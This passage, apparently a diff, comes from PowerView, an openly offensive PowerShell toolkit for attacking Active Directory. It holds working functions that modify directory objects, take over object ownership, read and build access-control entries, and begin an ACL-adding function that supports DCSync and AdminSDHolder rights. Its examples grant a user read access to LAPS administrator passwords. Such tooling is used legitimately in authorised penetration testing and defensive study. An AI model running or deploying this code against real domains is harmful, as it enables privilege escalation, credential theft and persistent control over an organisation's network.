($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + } + + PROCESS { + if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity } + + # splat the appropriate arguments to Get-DomainObject + $RawObject = Get-DomainObject @SearcherArguments + + ForEach ($Object in $RawObject) { + + $Entry = $RawObject.GetDirectoryEntry() + + if($PSBoundParameters['Set']) { + try { + $PSBoundParameters['Set'].GetEnumerator() | ForEach-Object { + Write-Verbose "[Set-DomainObject] Setting '$($_.Name)' to '$($_.Value)' for object '$($RawObject.Properties.samaccountname)'" + $Entry.put($_.Name, $_.Value) + } + $Entry.commitchanges() + } + catch { + Write-Warning "[Set-DomainObject] Error setting/replacing properties for object '$($RawObject.Properties.samaccountname)' : $_" + } + } + if($PSBoundParameters['XOR']) { + try { + $PSBoundParameters['XOR'].GetEnumerator() | ForEach-Object { + $PropertyName = $_.Name + $PropertyXorValue = $_.Value + Write-Verbose "[Set-DomainObject] XORing '$PropertyName' with '$PropertyXorValue' for object '$($RawObject.Properties.samaccountname)'" + $TypeName = $Entry.$PropertyName[0].GetType().name + + # UAC value references- https://support.microsoft.com/en-us/kb/305144 + $PropertyValue = $($Entry.$PropertyName) -bxor $PropertyXorValue + $Entry.$PropertyName = $PropertyValue -as $TypeName + } + $Entry.commitchanges() + } + catch { + Write-Warning "[Set-DomainObject] Error XOR'ing properties for object '$($RawObject.Properties.samaccountname)' : $_" + } + } + if($PSBoundParameters['Clear']) { + try { + $PSBoundParameters['Clear'] | ForEach-Object { + $PropertyName = $_ + Write-Verbose "[Set-DomainObject] Clearing '$PropertyName' for object '$($RawObject.Properties.samaccountname)'" + $Entry.$PropertyName.clear() + } + $Entry.commitchanges() + } + catch { + Write-Warning "[Set-DomainObject] Error clearing properties for object '$($RawObject.Properties.samaccountname)' : $_" + } + } + } + } +} + + +function ConvertFrom-LDAPLogonHours { +<# +.SYNOPSIS + +Converts the LDAP LogonHours array to a processible object. + +Author: Lee Christensen (@tifkin_) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +Converts the LDAP LogonHours array to a processible object. Each entry +property in the output object corresponds to a day of the week and hour during +the day (in UTC) indicating whether or not the user can logon at the specified +hour. + +.PARAMETER LogonHoursArray + +21-byte LDAP hours array. + +.EXAMPLE + +$hours = (Get-DomainUser -LDAPFilter 'userworkstations=*')[0].logonhours +ConvertFrom-LDAPLogonHours $hours + +Gets the logonhours array from the first AD user with logon restrictions. + +.OUTPUTS + +PowerView.LogonHours +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.LogonHours')] + [CmdletBinding()] + Param ( + [Parameter( ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] + [byte[]] + $LogonHoursArray + ) + + Begin { + if($LogonHoursArray.Count -ne 21) { + throw "LogonHoursArray is the incorrect length" + } + + function ConvertTo-LogonHoursArray { + Param ( + [int[]] + $HoursArr + ) + + $LogonHours = New-Object bool[] 24 + for($i=0; $i -lt 3; $i++) { + $Byte = $HoursArr[$i] + $Offset = $i * 8 + $Str = [Convert]::ToString($Byte,2).PadLeft(8,'0') + + $LogonHours[$Offset+0] = [bool] [convert]::ToInt32([string]$Str[7]) + $LogonHours[$Offset+1] = [bool] [convert]::ToInt32([string]$Str[6]) + $LogonHours[$Offset+2] = [bool] [convert]::ToInt32([string]$Str[5]) + $LogonHours[$Offset+3] = [bool] [convert]::ToInt32([string]$Str[4]) + $LogonHours[$Offset+4] = [bool] [convert]::ToInt32([string]$Str[3]) + $LogonHours[$Offset+5] = [bool] [convert]::ToInt32([string]$Str[2]) + $LogonHours[$Offset+6] = [bool] [convert]::ToInt32([string]$Str[1]) + $LogonHours[$Offset+7] = [bool] [convert]::ToInt32([string]$Str[0]) + } + + $LogonHours + } + } + + Process { + $Output = @{ + Sunday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[0..2] + Monday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[3..5] + Tuesday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[6..8] + Wednesday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[9..11] + Thurs = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[12..14] + Friday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[15..17] + Saturday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[18..20] + } + + $Output = New-Object PSObject -Property $Output + $Output.PSObject.TypeNames.Insert(0, 'PowerView.LogonHours') + $Output + } +} + + +function New-ADObjectAccessControlEntry { +<# +.SYNOPSIS + +Creates a new Active Directory object-specific access control entry. + +Author: Lee Christensen (@tifkin_) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +Creates a new object-specific access control entry (ACE). The ACE could be +used for auditing access to an object or controlling access to objects. + +.PARAMETER PrincipalIdentity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +for the domain principal to add for the ACL. Required. Wildcards accepted. + +.PARAMETER PrincipalDomain + +Specifies the domain for the TargetIdentity to use for the principal, defaults to the current domain. + +.PARAMETER PrincipalSearchBase + +The LDAP source to search through for principals, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Right + +Specifies the rights set on the Active Directory object. + +.PARAMETER AccessControlType + +Specifies the type of ACE (allow or deny) + +.PARAMETER AuditFlag + +For audit ACEs, specifies when to create an audit log (on success or failure) + +.PARAMETER ObjectType + +Specifies the GUID of the object that the ACE applies to. + +.PARAMETER InheritanceType + +Specifies how the ACE applies to the object and/or its children. + +.PARAMETER InheritedObjectType + +Specifies the type of object that can inherit the ACE. + +.EXAMPLE + +$Guids = Get-DomainGUIDMap +$AdmPropertyGuid = $Guids.GetEnumerator() | ?{$_.value -eq 'ms-Mcs-AdmPwd'} | select -ExpandProperty name +$CompPropertyGuid = $Guids.GetEnumerator() | ?{$_.value -eq 'Computer'} | select -ExpandProperty name +$ACE = New-ADObjectAccessControlEntry -Verbose -PrincipalIdentity itadmin -Right ExtendedRight,ReadProperty -AccessControlType Allow -ObjectType $AdmPropertyGuid -InheritanceType All -InheritedObjectType $CompPropertyGuid +$OU = Get-DomainOU -Raw Workstations +$DsEntry = $OU.GetDirectoryEntry() +$dsEntry.PsBase.Options.SecurityMasks = 'Dacl' +$dsEntry.PsBase.ObjectSecurity.AddAccessRule($ACE) +$dsEntry.PsBase.CommitChanges() + +Adds an ACE to all computer objects in the OU "Workstations" permitting the +user "itadmin" to read the confidential ms-Mcs-AdmPwd computer property. + +.OUTPUTS + +System.Security.AccessControl.AuthorizationRule +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('System.Security.AccessControl.AuthorizationRule')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True, Mandatory = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name')] + [String] + $PrincipalIdentity, + + [ValidateNotNullOrEmpty()] + [String] + $PrincipalDomain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $True)] + [ValidateSet('AccessSystemSecurity', 'CreateChild','Delete','DeleteChild','DeleteTree','ExtendedRight','GenericAll','GenericExecute','GenericRead','GenericWrite','ListChildren','ListObject','ReadControl','ReadProperty','Self','Synchronize','WriteDacl','WriteOwner','WriteProperty')] + $Right, + + [Parameter(Mandatory = $True, ParameterSetName='AccessRuleType')] + [ValidateSet('Allow', 'Deny')] + [String[]] + $AccessControlType, + + [Parameter(Mandatory = $True, ParameterSetName='AuditRuleType')] + [ValidateSet('Success', 'Failure')] + [String] + $AuditFlag, + + [Parameter(Mandatory = $False, ParameterSetName='AccessRuleType')] + [Parameter(Mandatory = $False, ParameterSetName='AuditRuleType')] + [Parameter(Mandatory = $False, ParameterSetName='ObjectGuidLookup')] + [Guid] + $ObjectType, + + [ValidateSet('All', 'Children','Descendents','None','SelfAndChildren')] + [String] + $InheritanceType, + + [Guid] + $InheritedObjectType + ) + + Begin { + if ($PrincipalIdentity -notmatch '^S-1-.*') { + $PrincipalSearcherArguments = @{ + 'Identity' = $PrincipalIdentity + 'Properties' = 'distinguishedname,objectsid' + } + if ($PSBoundParameters['PrincipalDomain']) { $PrincipalSearcherArguments['Domain'] = $PrincipalDomain } + if ($PSBoundParameters['Server']) { $PrincipalSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $PrincipalSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $PrincipalSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $PrincipalSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $PrincipalSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $PrincipalSearcherArguments['Credential'] = $Credential } + $Principal = Get-DomainObject @PrincipalSearcherArguments + if (-not $Principal) { + throw "Unable to resolve principal: $PrincipalIdentity" + } + elseif($Principal.Count -gt 1) { + throw "PrincipalIdentity matches multiple AD objects, but only one is allowed" + } + $ObjectSid = $Principal.objectsid + } + else { + $ObjectSid = $PrincipalIdentity + } + + $ADRight = 0 + foreach($r in $Right) { + $ADRight = $ADRight -bor (([System.DirectoryServices.ActiveDirectoryRights]$r).value__) + } + $ADRight = [System.DirectoryServices.ActiveDirectoryRights]$ADRight + + $Identity = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$ObjectSid) + } + + Process { + if($PSCmdlet.ParameterSetName -eq 'AuditRuleType') { + + if($ObjectType -eq $null -and $InheritanceType -eq [String]::Empty -and $InheritedObjectType -eq $null) { + New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag + } elseif($ObjectType -eq $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -eq $null) { + New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$InheritanceType) + } elseif($ObjectType -eq $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -ne $null) { + New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$InheritanceType), $InheritedObjectType + } elseif($ObjectType -ne $null -and $InheritanceType -eq [String]::Empty -and $InheritedObjectType -eq $null) { + New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, $ObjectType + } elseif($ObjectType -ne $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -eq $null) { + New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, $ObjectType, $InheritanceType + } elseif($ObjectType -ne $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -ne $null) { + New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, $ObjectType, $InheritanceType, $InheritedObjectType + } + + } + else { + + if($ObjectType -eq $null -and $InheritanceType -eq [String]::Empty -and $InheritedObjectType -eq $null) { + New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType + } elseif($ObjectType -eq $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -eq $null) { + New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$InheritanceType) + } elseif($ObjectType -eq $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -ne $null) { + New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$InheritanceType), $InheritedObjectType + } elseif($ObjectType -ne $null -and $InheritanceType -eq [String]::Empty -and $InheritedObjectType -eq $null) { + New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, $ObjectType + } elseif($ObjectType -ne $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -eq $null) { + New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, $ObjectType, $InheritanceType + } elseif($ObjectType -ne $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -ne $null) { + New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, $ObjectType, $InheritanceType, $InheritedObjectType + } + + } + } +} + + +function Set-DomainObjectOwner { +<# +.SYNOPSIS + +Modifies the owner for a specified active directory object. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject + +.DESCRIPTION + +Retrieves the Active Directory object specified by -Identity by splatting to +Get-DomainObject, returning the raw searchresult object. Retrieves the raw +directoryentry for the object, and sets the object owner to -OwnerIdentity. + +.PARAMETER Identity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +of the AD object to set the owner for. + +.PARAMETER OwnerIdentity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +of the owner to set for -Identity. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y + +Set the owner of 'dfm' in the current domain to 'harmj0y'. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y -Credential $Cred + +Set the owner of 'dfm' in the current domain to 'harmj0y' using the alternate credentials. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name')] + [String] + $Identity, + + [Parameter(Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [Alias('Owner')] + [String] + $OwnerIdentity, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + + $OwnerSid = Get-DomainObject @SearcherArguments -Identity $OwnerIdentity -Properties objectsid | Select-Object -ExpandProperty objectsid + if ($OwnerSid) { + $OwnerIdentityReference = [System.Security.Principal.SecurityIdentifier]$OwnerSid + } + else { + Write-Warning "[Set-DomainObjectOwner] Error parsing owner identity '$OwnerIdentity'" + } + } + + PROCESS { + if ($OwnerIdentityReference) { + $SearcherArguments['Raw'] = $True + $SearcherArguments['Identity'] = $Identity + + # splat the appropriate arguments to Get-DomainObject + $RawObject = Get-DomainObject @SearcherArguments + + ForEach ($Object in $RawObject) { + try { + Write-Verbose "[Set-DomainObjectOwner] Attempting to set the owner for '$Identity' to '$OwnerIdentity'" + $Entry = $RawObject.GetDirectoryEntry() + $Entry.PsBase.Options.SecurityMasks = 'Owner' + $Entry.PsBase.ObjectSecurity.SetOwner($OwnerIdentityReference) + $Entry.PsBase.CommitChanges() + } + catch { + Write-Warning "[Set-DomainObjectOwner] Error setting owner: $_" + } + } + } + } +} + + +function Get-DomainObjectAcl { +<# +.SYNOPSIS + +Returns the ACLs associated with a specific active directory object. By default +the DACL for the object(s) is returned, but the SACL can be returned with -Sacl. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Get-DomainGUIDMap + +.PARAMETER Identity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +.PARAMETER Sacl + +Switch. Return the SACL instead of the DACL for the object (default behavior). + +.PARAMETER ResolveGUIDs + +Switch. Resolve GUIDs to their display names. + +.PARAMETER RightsFilter + +A specific set of rights to return ('All', 'ResetPassword', 'WriteMembers'). + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainObjectAcl -Identity matt.admin -domain testlab.local -ResolveGUIDs + +Get the ACLs for the matt.admin user in the testlab.local domain and +resolve relevant GUIDs to their display names. + +.EXAMPLE + +Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs + +Enumerate the ACL permissions for all OUs in the domain. + +.EXAMPLE + +Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs -Sacl + +Enumerate the SACLs for all OUs in the domain, resolving GUIDs. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainObjectAcl -Credential $Cred -ResolveGUIDs + +.OUTPUTS + +PowerView.ACL + +Custom PSObject with ACL entries. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.ACL')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name')] + [String[]] + $Identity, + + [Switch] + $Sacl, + + [Switch] + $ResolveGUIDs, + + [String] + [Alias('Rights')] + [ValidateSet('All', 'ResetPassword', 'WriteMembers')] + $RightsFilter, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $SearcherArguments = @{ + 'Properties' = 'samaccountname,ntsecuritydescriptor,distinguishedname,objectsid' + } + + if ($PSBoundParameters['Sacl']) { + $SearcherArguments['SecurityMasks'] = 'Sacl' + } + else { + $SearcherArguments['SecurityMasks'] = 'Dacl' + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $Searcher = Get-DomainSearcher @SearcherArguments + + $DomainGUIDMapArguments = @{} + if ($PSBoundParameters['Domain']) { $DomainGUIDMapArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $DomainGUIDMapArguments['Server'] = $Server } + if ($PSBoundParameters['ResultPageSize']) { $DomainGUIDMapArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $DomainGUIDMapArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Credential']) { $DomainGUIDMapArguments['Credential'] = $Credential } + + # get a GUID -> name mapping + if ($PSBoundParameters['ResolveGUIDs']) { + $GUIDs = Get-DomainGUIDMap @DomainGUIDMapArguments + } + } + + PROCESS { + if ($Searcher) { + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match '^S-1-.*') { + $IdentityFilter += "(objectsid=$IdentityInstance)" + } + elseif ($IdentityInstance -match '^(CN|OU|DC)=.*') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + Write-Verbose "[Get-DomainObjectAcl] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $Searcher = Get-DomainSearcher @SearcherArguments + if (-not $Searcher) { + Write-Warning "[Get-DomainObjectAcl] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') { + $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join '' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + elseif ($IdentityInstance.Contains('.')) { + $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(dnshostname=$IdentityInstance))" + } + else { + $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(displayname=$IdentityInstance))" + } + } + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainObjectAcl] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + + if ($Filter) { + $Searcher.filter = "(&$Filter)" + } + Write-Verbose "[Get-DomainObjectAcl] Get-DomainObjectAcl filter string: $($Searcher.filter)" + + $Results = $Searcher.FindAll() + $Results | Where-Object {$_} | ForEach-Object { + $Object = $_.Properties + + if ($Object.objectsid -and $Object.objectsid[0]) { + $ObjectSid = (New-Object System.Security.Principal.SecurityIdentifier($Object.objectsid[0],0)).Value + } + else { + $ObjectSid = $Null + } + + try { + New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Object['ntsecuritydescriptor'][0], 0 | ForEach-Object { if ($PSBoundParameters['Sacl']) {$_.SystemAcl} else {$_.DiscretionaryAcl} } | ForEach-Object { + if ($PSBoundParameters['RightsFilter']) { + $GuidFilter = Switch ($RightsFilter) { + 'ResetPassword' { '00299570-246d-11d0-a768-00aa006e0529' } + 'WriteMembers' { 'bf9679c0-0de6-11d0-a285-00aa003049e2' } + Default { '00000000-0000-0000-0000-000000000000' } + } + if ($_.ObjectType -eq $GuidFilter) { + $_ | Add-Member NoteProperty 'ObjectDN' $Object.distinguishedname[0] + $_ | Add-Member NoteProperty 'ObjectSID' $ObjectSid + $Continue = $True + } + } + else { + $_ | Add-Member NoteProperty 'ObjectDN' $Object.distinguishedname[0] + $_ | Add-Member NoteProperty 'ObjectSID' $ObjectSid + $Continue = $True + } + + if ($Continue) { + $_ | Add-Member NoteProperty 'ActiveDirectoryRights' ([Enum]::ToObject([System.DirectoryServices.ActiveDirectoryRights], $_.AccessMask)) + if ($GUIDs) { + # if we're resolving GUIDs, map them them to the resolved hash table + $AclProperties = @{} + $_.psobject.properties | ForEach-Object { + if ($_.Name -match 'ObjectType|InheritedObjectType|ObjectAceType|InheritedObjectAceType') { + try { + $AclProperties[$_.Name] = $GUIDs[$_.Value.toString()] + } + catch { + $AclProperties[$_.Name] = $_.Value + } + } + else { + $AclProperties[$_.Name] = $_.Value + } + } + $OutObject = New-Object -TypeName PSObject -Property $AclProperties + $OutObject.PSObject.TypeNames.Insert(0, 'PowerView.ACL') + $OutObject + } + else { + $_.PSObject.TypeNames.Insert(0, 'PowerView.ACL') + $_ + } + } + } + } + catch { + Write-Verbose "[Get-DomainObjectAcl] Error: $_" + } + } + } + } +} + + +function Add-DomainObjectAcl { +<# +.SYNOPSIS + +Adds an ACL for a specific active directory object. + +AdminSDHolder ACL approach from Sean Metcalf (@pyrotek3): https://adsecurity.org/?p=1906 + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject + +.DESCRIPTION + +This function modifies the ACL/ACE entries for a given Active Directory +target object specified by -TargetIdentity. Available -Rights are +'All', 'ResetPassword', 'WriteMembers', 'DCSync', or a manual extended +rights GUID 